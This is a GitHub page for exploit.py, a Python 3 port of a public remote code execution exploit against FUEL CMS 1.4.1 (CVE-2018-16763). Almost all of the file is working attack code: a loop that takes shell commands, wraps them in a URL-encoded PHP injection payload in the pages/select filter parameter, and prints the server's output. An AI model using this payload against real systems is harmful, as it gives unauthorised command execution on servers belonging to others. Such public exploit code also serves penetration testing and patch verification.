-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathexploit.py
More file actions
28 lines (24 loc) · 1000 Bytes
/
exploit.py
File metadata and controls
28 lines (24 loc) · 1000 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#!/bin/env python3
#
# fuelCMS 1.4.1 - Remote Code Execution
#
# Port Author: n3m1.sys
# Original exploit by 0xd0ff9: https://www.exploit-db.com/exploits/47138
#
# This is a port to Python 3 of the original exploit, as Python 2 is now deprecated.
#
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
import requests
import urllib
url = "http://x.x.x.x:port" # Change this to the target URL
proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url)
while 1:
command = input("$: ")
exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(command)+"%27%29%2b%27"
r = requests.get(exploit_url, proxies=proxy)
print(r.text[r.text.find("system")+6:r.text.find("<div ")])